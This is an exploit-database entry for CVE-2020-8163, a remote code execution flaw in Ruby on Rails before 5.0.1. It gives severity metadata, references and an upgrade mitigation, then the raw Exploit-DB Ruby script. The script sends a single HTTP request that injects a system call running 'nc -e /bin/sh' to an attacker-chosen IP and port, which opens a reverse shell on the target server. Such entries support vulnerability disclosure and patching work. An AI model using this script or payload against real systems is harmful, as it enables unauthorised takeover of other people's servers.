header-logo
Suggest Exploit
vendor:
Rails
by:
Lucas Amorim
8.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Rails
Affected Version From: Rails < 5.0.1
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2020-8163
CPE: a:rubyonrails:rubyonrails
Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-8163/https://www.rapid7.com/db/vulnerabilities/ruby_on_rails-cve-2020-8163/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-8163/
Other Scripts:
Tags: cve,cve2020,rails,rce,hackerone
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://hackerone.com/reports/304805https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0https://lists.debian.org/debian-lts-announce/2020/07/msg00013.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2020-8163
Nuclei Metadata: {'max-request': 1, 'vendor': 'rubyonrails', 'product': 'rails'}
Platforms Tested: Linux, OSx
2020

Rails 5.0.1 – Remote Code Execution

Remote code execution of user-provided local names in Rails < 5.0.1

Mitigation:

Upgrade to Rails 5.0.1 or newer version
Source

Exploit-DB raw data:

# Exploit Title: Rails 5.0.1 - Remote Code Execution
# Date: 2020-07-19
# Exploit Author: Lucas Amorim
# Vendor Homepage: www.rubyonrails.org
# Software Link: www.rubyonrails.org
# Version: Rails < 5.0.1
# Tested on: Linux/OSx
# CVE : CVE-2020-8163
# More information: https://github.com/sh286/CVE-2020-8163

#!/usr/bin/ruby

require 'net/http'

def header
  puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\n" 
  puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"
  puts "[*] - Usage: \n"
  puts "ruby exploit.rb <url> <ip> <port>"
end
if ARGV.length < 3
  header
  exit(-1)
end

url  = ARGV[0]
ip   = ARGV[1]
port = ARGV[2]

puts "[*] Sending payload to #{url}"
uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")
Net::HTTP.get(uri)

Navigation

Suggest Exploit

Services By CQR